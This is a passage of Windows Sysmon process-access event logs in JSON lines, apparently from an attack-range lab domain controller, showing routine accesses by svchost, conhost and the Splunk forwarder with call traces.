C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3494,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3495,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3496,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3497,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3498,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3499,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3500,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010094D0500}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010094D0500}","TargetProcessId":"4676","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3501,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.482\r\nSourceProcessGUID: {A837DB8D-023C-5F25-0000-0010094D0500}\r\nSourceProcessId: 4676\r\nSourceThreadId: 4688\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.482","SourceProcessGUID":"{A837DB8D-023C-5F25-0000-0010094D0500}","SourceProcessId":"4676","SourceThreadId":"4688","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 